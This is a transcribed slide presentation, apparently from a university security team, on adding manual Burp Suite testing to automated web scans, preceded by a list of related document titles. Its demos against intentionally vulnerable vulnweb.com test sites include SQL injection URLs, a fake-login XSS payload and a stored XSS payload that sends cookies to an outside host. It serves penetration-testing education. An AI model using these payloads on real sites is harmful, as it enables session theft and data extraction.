Adding Value to Automated Web Scans. Burp Suite and Beyond



Similar documents
(WAPT) Web Application Penetration Testing

HackMiami Web Application Scanner 2013 PwnOff

Check list for web developers

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

Attack and Penetration Testing 101

Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins

Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM

Testnet Summerschool. Web Application Security Testing. Dave van Stein

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

WebCruiser Web Vulnerability Scanner User Guide

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert

Conducting Web Application Pentests. From Scoping to Report For Education Purposes Only

WebCruiser User Guide

Web Application Penetration Testing

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

The Top Web Application Attacks: Are you vulnerable?

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

Web Application Firewall Profiling and Evasion. Michael Ritter Cyber Risk Services Deloitte

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

Chapter 1 Web Application (In)security 1

Security Evaluation of Web Application. Using Custom Web Application

Penetration Testing. Types Black Box. Methods Automated Manual Hybrid. oless productive, more difficult White Box

WebCruiser Web Vulnerability Scanner User Guide

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

Cross Site Scripting in Joomla Acajoom Component


Essential IT Security Testing

WEB APPLICATION HACKING. Part 2: Tools of the Trade (and how to use them)

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant

ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION

Web-Application Security

Revisiting SQL Injection Will we ever get it right? Michael Sutton, Security Evangelist

List of Scanner Features (3 of 3)

Web Application Attacks And WAF Evasion

Web Application Security

Project 2: Web Security Pitfalls

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

Guidelines for Web applications protection with dedicated Web Application Firewall

QualysGuard WAS. Getting Started Guide Version 3.3. March 21, 2014

Attacks on Clients: Dynamic Content & XSS

Cyber Security Challenge Australia 2014

Web application testing

Vulnerability Assessment and Penetration Testing

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Complete Cross-site Scripting Walkthrough

Cross-Site Scripting

SQL INJECTION IN MYSQL

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Cloud Application Security Assessment, Guerrilla Style

Advanced Web Security, Lab

Webapps Vulnerability Report

External Network & Web Application Assessment. For The XXX Group LLC October 2012

Using Free Tools To Test Web Application Security

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

Smashing Web Apps Applying Fuzzing to Web Applications and Web Services. Michael Sutton, Security Evangelist

Security Testing with Selenium

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

Bust a cap in a web app with OWASP ZAP

Application Security Testing. Generic Test Strategy

FINAL DoIT v.8 APPLICATION SECURITY PROCEDURE

Penetration Testing with Kali Linux

Client logo placeholder XXX REPORT. Page 1 of 37

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

1. Building Testing Environment

SENSITIVE AUSTRALIAN SPORTS COMMISSION ATHLETE MANAGEMENT SYSTEM (AMS) SMARTBASE SECURITY TEST PLAN. Final. Version 1.0

State of The Art: Automated Black Box Web Application Vulnerability Testing. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell

Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper

Practical Identification of SQL Injection Vulnerabilities

Defending Against Web App A0acks Using ModSecurity. Jason Wood Principal Security Consultant Secure Ideas

SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER

Detection of SQL Injection and XSS Vulnerability in Web Application

BDD FOR AUTOMATING WEB APPLICATION TESTING. Stephen de Vries

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Deciphering The Prominent Security Tools Ofkali Linux

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

CS 558 Internet Systems and Technologies

Web Security Testing Cookbook*

Testing the OWASP Top 10 Security Issues

Criteria for web application security check. Version

McAfee Certified Assessment Specialist Network

OWASP OWASP. The OWASP Foundation Selected vulnerabilities in web management consoles of network devices

Preparing for the Cross Site Request Forgery Defense

Next Generation Clickjacking

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

Improving Web Vulnerability Scanning. Daniel Zulla

Application Security Testing

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Real World Web Service Testing For Web Hackers

Newsletter - September T o o l s W a t c h T e a m NJ OUCHN & MJ SOLER

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Web application security

Application security testing: Protecting your application and data

EECS 398 Project 2: Classic Web Vulnerabilities

Web Application Security

Transcription:

Adding Value to Automated Web Scans Burp Suite and Beyond

Automated Scanning vs Manual Tes;ng Manual Tes;ng Tools/Suites At MSU - QualysGuard WAS & Burp Suite Automated Scanning - iden;fy acack surface accross organiza;on Manual Tes;ng - proxy tools used to verify scan results and find what automated scans miss Both necessary in a large enviroment

Automated Scanning vs Manual Tes;ng Strengths of Automated Scanners: Scheduling Repor;ng Scalability Strengths of Manual Scanners: Proxy based - allows intercep;on of requests Customize payloads for vulnerability detec;on Verify findings from automated scan results.

Automated Scanning vs Manual Tes;ng Weaknesses of automated scanners: increased poten;al for false posi;ves duplicate findings code coverage not as thourough Weaknesses of manual scanning: tester needs knowledge of applica;on for best results learning curve (developers already stretched thin) not scalable (e.g. distribu;ng reports is very ;me consuming)

Methodology Reconnaissance Spider target Hidden Files Google site search End result is a comprehensive map of site Discovery Automated Scanning Manual Detec;on and Analysis Exploit Automated Exploit tools - sqlmap, havij, metasploit Burp Suite - hands- on tes=ng 5

Road Map Spider and vulnerability scan already performed Leverage Burp tools to expand upon proof of concepts from scan results Carry out actual acack scenarios 6

Tools for this Demo BurpSuite Firefox FoxyProxy addon Firebug addon Target: *.vulnweb.com (inten;onally vulnerable websites from Acune;x)

Scan Results Vulnerabilty reports - proof of concept (POC) include request payload and applica;on response POCs are not intui;ve, o\en met with doubt Need to be able to drive home the real risk

Scan Report - XSS example

Scan Report - SQLi Example

SQL Injec;on Boolean Based SQLi (Blind SQL Injec;on) Blind SQLi is possible if applica;on will respond to true and false condi;ons in a detectable manner* hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and 1=1 //true condi;on hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and 1=2 //false condi;on ` *Differences between true and false responses could be subtle. The comparer tool highlights the differences between two responses Error Based SQLi Possible if applica;on echos database errors to browser. Errors to reveal informa;on about database that serve as clues for building an acack. 11

Demo - SQLi A BeBer Blind SQLi Proof of Concept hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and substring(@@version, 1,1)=4 and 1=1 // false hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and substring(@@version, 1,1)=5 and 1=1 //true

SQLi Exploit Example A BeBer Error Based SQLi POC testphp.vulnweb.com/listproducts.php?ar=st=1' - error vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10 - error vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10,11 - no error! vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10,11 from users - no error!

Cross Site Scrip;ng XSS type 0 - DOM Based acack string embedded in URL and not processed by the server. Executed in the DOM client- side (very much like reflected) XSS type 1 Reflected acack string is submiced with request (usually in URL) and the server embeds the string in the HTML of the response *DOM based and reflected depend on social engineering to succeed XSS type 2 - Persistent (stored) XSS the applica;on stores the acack string so that it is presented in future responses 14

Reflected XSS Demo Target: hcp://testasp.vulnweb.com/search.asp?msearch= Goal: modify page to look like login Payload: /Search.asp?mSearch= <script>document.getelementsbyclassname('framedform').item(0).innerhtml = "password <div ><input type='password' id='pw' /><input type='bucon' onclick='alert(pw.value)' value='login' /></div>"; document.getelementsbyclassname('path').item(0).innerhtml = '';</script> *Requires social engineering. Obfuscate the query string to hide script

Same Origin Policy Same Origin Policy - SOP allows you to make requests to pages within the same site/domain, while preven;ng you from making requests to pages on a different domain. Without SOP the internet would be very unsafe. Visit my evil site and I can direct your browser to acack any site I want. Goal of XSS acack is to subvert SOP to exfiltrate informa;on

Bypassing SOP Image source You are allowed to include images with source outside of the applica;on's domain <img src= evildomain.com? id= /> the src is an HTTP GET request Example XSS <div onmouseover= xssscript() ><img id='evil' src='evildomain.com?id=' size='1px' /></div> <script> func;on xssscript( ){..}</script></div> 17

Persistent XSS Demo Target: hcp://testphp.vulnweb.com/guestbook.php Goal: Inject javascript and image to bypass SOP Objec=ve is to send cookie to my evil site: www.montana.edu/hardin/ cookiejar.php?d={cookie}

Persistent XSS Demo Payload: Hello<div onmouseover=addsource() style= width:100% > <img size='1px' id='badimg' /></div> there <script> func;on addsource(){ document.getelementbyid("badimg").src = "hcp:// www.montana.edu/hardin/cookiejar.php?d="+document.cookie; } </script>

SOP has been subverted!!!

Ques;ons hardin@montana.edu

SQLi Exploit Example Goal: Use Intruder to brute force the value of the credit card field 1. Set proxy to intercept 2. Submit request in browser hcp://testphp.vulnweb.com/ar;sts.php?ar;st=1 and (select substring(cc,1,1)= 1 from users limit 0,1)=1 3. Send intercepted request to Intruder tool 4. Indicate posi=on(s) to be injected hcp://testphp.vulnweb.com/ar;sts.php?ar;st=1 and (select substring(cc,1,1)= 1 from users limit 0,1)=1 5. Define the payloads 6. Start ABack